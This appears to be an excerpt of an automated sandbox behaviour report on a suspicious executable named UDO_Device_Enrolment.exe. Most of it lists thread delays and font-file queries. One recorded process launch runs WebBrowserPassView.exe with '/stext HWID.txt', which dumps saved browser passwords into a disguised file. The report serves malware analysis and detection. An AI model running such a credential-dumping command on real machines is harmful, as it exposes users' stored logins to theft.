Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Thread delayed: delay time: 98327	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Thread delayed: delay time: 98219	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Thread delayed: delay time: 98097	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Thread delayed: delay time: 97953	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Thread delayed: delay time: 97828	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Thread delayed: delay time: 97714	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Thread delayed: delay time: 97594	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Thread delayed: delay time: 97470	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Thread delayed: delay time: 97313	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Thread delayed: delay time: 97173	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Thread delayed: delay time: 97000	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Thread delayed: delay time: 96878	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Thread delayed: delay time: 96745	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Thread delayed: delay time: 96635	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Thread delayed: delay time: 96499	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Thread delayed: delay time: 96373	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Thread delayed: delay time: 96265	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Thread delayed: delay time: 96152	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Thread delayed: delay time: 96044	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Thread delayed: delay time: 95937	Jump to behavior

Source: UDO_Device_Enrolment.exe, 00000000.00000002.336001775.000000001AFB5000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\temp\Windows32\WebBrowserPassView.exe

1_2_0040BAE3

Source: C:\temp\Windows32\WebBrowserPassView.exe

Code function: 1_2_004053E1 LoadLibraryW,GetProcAddress,FreeLibrary,#17,MessageBoxW,

1_2_004053E1

Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe

Process created: C:\temp\Windows32\WebBrowserPassView.exe "C:\temp\Windows32\WebBrowserPassView.exe" /stext HWID.txt

Jump to behavior

Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Users\user\Desktop\UDO_Device_Enrolment.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UDO_Device_Enrolment.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
